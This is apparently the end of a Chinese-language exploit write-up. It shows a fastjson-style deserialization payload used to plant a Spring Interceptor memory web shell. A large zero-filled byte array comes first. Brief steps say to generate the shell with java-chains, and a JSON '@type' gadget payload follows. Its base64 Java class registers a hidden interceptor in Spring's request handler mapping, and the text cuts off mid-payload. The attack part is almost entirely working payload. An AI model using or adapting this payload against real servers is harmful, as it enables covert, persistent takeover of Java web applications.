0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
                }],
  "x":{"$ref":"$.bOM"}
}

然后生成内存马,这里也用java-chains,生成Spring Interceptor内存马:

img

这里base64不需要URL编码

最后加载内存马:

1
2
3
4
5
6
7
8
9
10
{
"@type": "java.lang.Exception",
"@type": "sun.net.spi.nameservice.dns.DNSNameServiceDescriptor",
"codez": "yv66vgAAADIBCgEAVm9yZy9hcGFjaGUvY29sbGVjdGlvbnMvY295b3RlL2pzb250eXBlL1N1YnR5cGVSZXNvbHZlcjQzMWM5NzVkMzczMTRkNWNiNWMyZDZiOWUxNTI1NTIyBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEADWdldFVybFBhdHRlcm4BABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAAi8qCAAHAQAMZ2V0Q2xhc3NOYW1lAQBSb3JnLmFwYWNoZS5zaGlyby5jb3lvdGUubW9kdWxlLlNpbXBsZURlc2VyaWFsaXplcnMwZTcxMDZiYmJlOGU0N2U1YTcwNzAxYzgxMDg1NTI5NggACgEAD2dldEJhc2U2NFN0cmluZwEAE2phdmEvaW8vSU9FeGNlcHRpb24HAA0BABBqYXZhL2xhbmcvU3RyaW5nBwAPAQnYSDRzSUFBQUFBQUFBQUsxWGFYc1QxeFYrcnlSN2hLeUVSQVR3MGdaSUE1RmtzR3hqTEM5SndEWUd1OWhPYWpsUXgra3lHbDFiQWxralprWTJUcHVFcG1tVDdsdTZwSHU2a1JaS1NRb3loSWJTNWVtSC9xRSsvZEwwdlRPeThDTFgrZERIZm1idWNzNTd6bjNQY2tmLy9NKzdkd0IwNE84Q2s2WTFsOUNMdXBHVkNUdWJzOHlFWVM2Wmprek1tNWxTWGlaU3VmbGlYaDZYdHJSeWVqNzN2TFRzZHBuc2FPOU9wOU95UjNZbDVSRTkyWjVzN3pCNk90cDdqaHpwN08zV0lBUjJudFVYOUVSZUw4d2xodks2YlkrWmVrWmFHdndDU1dYU0xscTV3dHlzcGMvTFJkTTZsMWlVNlFSdExPU2xreGl3bHdyR2lGN0k1S1UxV25Da1pjaWlZMUs1VGtETUVUczZNeGdiVzJlZ1h5QXdaR2Frd1BheFhFRk9sT2JUMHByUzAzbXVSTVpNUTgrZjFua0V6aXVMQVNlYnN3V214djcvRE5BWGtSYnd6UXdLTkdUa0xQMXhmUlRZVGRkSFJ6YzZIOFlEZURDRUFDSUM5WS9uQ2publNZSG02SG81ajhYKzJHa2FNSWkyeVg0WUQyR25RbXNVOEVkanA5VzhXYzFiQkxZVkxlbHhLNUR4REZ5b01wOTFuR0ppaEkrVXR6QXB6NWVrN2ZSdktXWVh6WUl0KzFmNTgxVDZyRFNjL3RpekFqdnVyUTVmVUxITW1RVU5ld1EwVzlvMkp3SjdON2ZnU3BCUnY1aytxNExyZ3BXY1hENHhyaGU1dnJPaWFsaEx6SkxFVUs2WUpRVUV0enpuQlI3N2dLY1VDRnFWa3doc1RVM2x6TFNVOVhKVkpkb0dBZ1R1U3ptNmNZN09WaEl2bEpVcVNoTk0vYlVhS1VmVkJLTjNDRzNiNEVOQ1lQOEg4bHhEQndNN0o1MFJGMW5nUUhRamJLeVdwY1BvYWtBbmpqQlBQYTlPNi9tU0RDUHBlZEFqOE1CNkxRMTlKTW93QzQ2ZUt6Q2xXOVprYVZhM1VzcXBnaUVaK3pBZXh4TWg5SVBaSEtKL3FaVjRQeEtOYlJYeE1JNWhRRG5ISW5yd1h0QkhkRHRMTGpVY0QyRVlMVUVjSU1OcmNrTERDTE9sV0dMa2U2SWJBMUlqUnpjdWhmRlJuR3JBS01hQ2lBYXhqL1ZXQ3VKcGRvMGl5eXlNU1krZmxNREQvL3NZR3A0aFczVEdKWmE1V0NNeU5UeGl5WjdCeHh0d0d0TTh5OEJ3S29pWlNpR3R5M1FObjJEd3lPMW93WFowMGk0UTJ6VDY2NnNrakUvaDB5RjhFcnJBbmpVQ2RsRWFpWlEwTE9tY2trc3B6alN3NHdScGFIREprWXg3SUJxYkdReERZbFlGZU03cmJUVU11OTBuRjBJR0xOK0FhbTFLZE5TVHRLVlJzbkxPVW9KR1hORTg1cFUvaFRXSjU3R2lvZWc1VU9tbE82SzErcWdGTzRUem9KSHQ2elkxTEFqY3Y2THZ0VXFCcG8wbzFTNTZBVXNoTE9MNUVFUGQ2RlhZWktYQ21sZlVjbVppc0RRN0t5Mlo4ZmFvOXdKZVZJbjdrc0N1MmpJYVB1YzJHejJqN2lxQmg2STFxL1B6ZUNXRWwvRUZtazUzZHgyWGhudS83YW9WWGhXS1YvR2E4dlJMN0VnWjgwU3VvT2Q1bWFpN1VtMStCVjlWeEg0dERBMUJKZllOcGsxQkx0NUxtN1ZPVkF2aFcvaTJJdUU3eEdKaDYzbGJYY0MxR24wWTM4WDNGUGZmWjdGWEc3MnR2SEU5SjJ2MWFkMlczVjBzNkZyWDk0SnVkYS8wODNYWEJiZDlhVUxWTGFneTByQzlraDl0cXVqYkJsM1VJSDVCVzdObXBiUHUzNklIcmlUTXIvQnJkYjdmZUIzS0k5a0s0aTMyNXBrTjRocCs1K1hCdUhTeVprYmdXQTByRzlWVzI3WGtiSjZFSlR3RU9uQUZ2MWNPWEdWR3oyemtWY00xZ2NiTjFEVzhRMVp6aFFYekhJL2NXeU11TlNCcmh2azZib1R3UjVRSjU0VXJpSnZNTmJ0VWFKdlAyVWJiNEVCcWVDVUhTYys3QW1GUHpzdnNJUDdFa0JpSDIyY3pQY251WktlUjdqQTZrMEhjSWQ2QW9hSVl4RjFTbDVtY3RtMTl4SndPNHEvWXh6UU1nQkx3ODhtZXlxOVNvVzQvOTUxMDMzVWNNV1A1M01iWkU1VDM4YjB0M3VwdnZiT01IZGM0OFNIRVp6MUZnR1kwOExuTEUwSVk5d0h1Nkg1czU3NVFIMFlWcUtjclVJM3gxbVUweFNOL3ZvR3BlT1F2TjlBZWovenRCbnJmcmlLSFhMazkySTI5cTlBYnEraU5YTmxkUVcrdW9BKzdSd0oyeDVmeG9hM0JQMEtJUjEzd3NLZFdBUmY0TUI2bUJDSEZMSStvY2UxNmEvdzYybStoMjRkLzRLMTdFdzU2eXpqNkJsNXZ2WVVoZ2I3QWJReFBMK05FWDExVFhlUWtGOGY5T01QaHhNSHE4S21tUUdVY2lIeU1BRk8zOEt3ZmtlZHVJdDFYMzFSZmR4dVphYlZjUmpieTNETE9sV0hlaG04NlhrYXBqTThzNDdOTjlmRXpSTDRvVU1ZWGIrTExaWHk5akcrVzhYcFRYUmsvT0hNSmRYMEIvNVhBRlo1a0h5N2pLaW4wdStmdVkwaUF4N2dhNDErYzdiS1YwVDJJRWNaL2lwSFhrVUFXN1hpUnYxTXU4enZsS2lXdW9RdnZvTnZsYVlSY3hOZ2M5K0VSQnJJVFMrVHdVV1pMRmtQa2NqKzVJbFBWRUYzSEFkb1M3aWhLUFo4N2l0T21uelpWRlB6L3dsVU5lL25UNVEzT1ZWYnVKZXRzcVJYMm55RmlIWGRlRVdPUlg5N0VwZkdEa2QrS3U3aGN4aDhPOHYxMkdjc1RoMGhMNUZiZ1BTeE8reVA5S1c0ZDR1VDh0RC9POGZKZHZPbjlqMTNDMFluSWJSZUVUUFVGbWdKSzhiM1ZpazJCVFRUSlorczErdVRqT1UvUXg1TzhiUzVXV2Uza2ljSHIySWVqckpsamFNRUE1VVlwT1VqSjR4aG5ZcVk0ZTRIOFhlVEt5emhWWmJPRnpQelFaU1NJSi9Fai9GaDk0SkFqdFJhZzV1SEsya25pL3dRL3BSelp3TS9jS3ZVUjZlZHVpU2syWS9DL1R5TStEV3hmYjBLUTEvZlJpMEJsenFtNzltK3NKaHYvQlQ0b2htU1hEZ0FBCAARAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAATABQKABAAFQEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HABgMABMAFwoABAAaAQAKZ2V0Q29udGV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7DAAcAB0KAAIAHgEADmdldEludGVyY2VwdG9yDAAgAB0KAAIAIQEADmFkZEludGVyY2VwdG9yAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylWDAAjACQKAAIAJQEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwAnAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgcAKQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24HACsBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgcALQEAEGphdmEvbGFuZy9UaHJlYWQHAC8BAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsMADEAMgoAMAAzAQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwwANQA2CgAwADcBADxvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5jb250ZXh0LnJlcXVlc3QuUmVxdWVzdENvbnRleHRIb2xkZXIIADkBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHADsBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7DAA9AD4KADwAPwEAFGdldFJlcXVlc3RBdHRyaWJ1dGVzCABBAQAMaW52b2tlTWV0aG9kAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsMAEMARAoAAgBFAQAKZ2V0UmVxdWVzdAgARwEACmdldFNlc3Npb24IAEkBABFnZXRTZXJ2bGV0Q29udGV4dAgASwEAQm9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQuc3VwcG9ydC5XZWJBcHBsaWNhdGlvbkNvbnRleHRVdGlscwgATQEAGGdldFdlYkFwcGxpY2F0aW9uQ29udGV4dAgATwEAD2phdmEvbGFuZy9DbGFzcwcAUQEAHGphdmF4LnNlcnZsZXQuU2VydmxldENvbnRleHQIAFMBAF0oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAEMAVQoAAgBWAQAxb3JnLnNwcmluZ2ZyYW1ld29yay5jb250ZXh0LnN1cHBvcnQuTGl2ZUJlYW5zVmlldwgAWAEAC25ld0luc3RhbmNlDABaAB0KAFIAWwEAE2FwcGxpY2F0aW9uQ29udGV4dHMIAF0BAAVnZXRGVgwAXwBECgACAGABABdqYXZhL3V0aWwvTGlua2VkSGFzaFNldAcAYgEACGl0ZXJhdG9yAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwwAZABlCgBjAGYBABJqYXZhL3V0aWwvSXRlcmF0b3IHAGgBAARuZXh0DABqAB0LAGkAawEANW9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQuV2ViQXBwbGljYXRpb25Db250ZXh0CABtAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7DABvAHAKAAQAcQEAEGlzQXNzaWduYWJsZUZyb20BABQoTGphdmEvbGFuZy9DbGFzczspWgwAcwB0CgBSAHUBABNqYXZhL2xhbmcvVGhyb3dhYmxlBwB3DAAJAAYKAAIAeQwADAAGCgACAHsBAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCDAB9AH4KAAIAfwEADmd6aXBEZWNvbXByZXNzAQAGKFtCKVtCDACBAIIKAAIAgwEAC2RlZmluZUNsYXNzCACFAQACW0IHAIcBABFqYXZhL2xhbmcvSW50ZWdlcgcAiQEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwwAiwCMCQCKAI0BABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAI8AkAoAUgCRAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwCTAQANc2V0QWNjZXNzaWJsZQEABChaKVYMAJUAlgoAlACXAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMAJkAmgoAigCbAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DACdAJ4KAJQAnwEAB2dldEJlYW4IAKEBABxyZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nCACjAQATYWRhcHRlZEludGVyY2VwdG9ycwgApQEAE2phdmEvdXRpbC9BcnJheUxpc3QHAKcBAANhZGQBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoMAKkAqgoAqACrAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcggArQEAB2Zvck5hbWUMAK8APgoAUgCwAQAMZGVjb2RlQnVmZmVyCACyAQAJZ2V0TWV0aG9kDAC0AJAKAFIAtQEAEGphdmEudXRpbC5CYXNlNjQIALcBAApnZXREZWNvZGVyCAC5AQAGZGVjb2RlCAC7AQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0HAL0KAL4AGgEAHGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW0HAMABAAUoW0IpVgwAEwDCCgDBAMMBAB1qYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbQcAxQEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwAEwDHCgDGAMgBAARyZWFkAQAFKFtCKUkMAMoAywoAxgDMAQAFd3JpdGUBAAcoW0JJSSlWDADOAM8KAL4A0AEAC3RvQnl0ZUFycmF5AQAEKClbQgwA0gDTCgC+ANQBAAVzZXRGVgEAOShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDspVgEABGdldEYBAD8oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMANgA2QoAAgDaAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQHANwBAANzZXQMAN4AJAoA3QDfCgDdAJcBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwA4gDjCgDdAOQBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HAOYBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DADoAOkKAFIA6gEADWdldFN1cGVyY2xhc3MMAOwAcAoAUgDtCgDnABUBABJnZXREZWNsYXJlZE1ldGhvZHMBAB0oKVtMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwA8ADxCgBSAPIBAAdnZXROYW1lDAD0AAYKAJQA9QEABmVxdWFscwwA9wCqCgAQAPgBABFnZXRQYXJhbWV0ZXJUeXBlcwEAFCgpW0xqYXZhL2xhbmcvQ2xhc3M7DAD6APsKAJQA/AoALAAVAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24HAP8BAApnZXRNZXNzYWdlDAEBAAYKAC4BAgoBAAAVAQAbW0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7BwEFAQAEQ29kZQEACkV4Y2VwdGlvbnMBAA1TdGFja01hcFRhYmxlACEAAgAEAAAAAAAOAAEABQAGAAEBBwAAAA8AAQABAAAAAxIIsAAAAAAAAQAJAAYAAQEHAAAADwABAAEAAAADEguwAAAAAAABAAwABgACAQcAAAAWAAMAAQAAAAq7ABBZEhK3ABawAAAAAAEIAAAABAABAA4AAQATABcAAgEHAAAAIQADAAMAAAAVKrcAGyq2AB9MKrcAIk0qKyy2ACaxAAAAAAEIAAAABAABABkAAQAcAB0AAgEHAAAA+gAHAAcAAACQuAA0tgA4TAFNKxI6tgBAEkK4AEZOLRJIuABGOgQZBBJKuABGOgUZBRJMuABGOgYrEk62AEASUAS9AFJZAysSVLYAQFMEvQAEWQMZBlO4AFdNpwAETizHADgrElm2AEC2AFwSXrgAYcAAY04ttgBnuQBsAQA6BCsSbrYAQ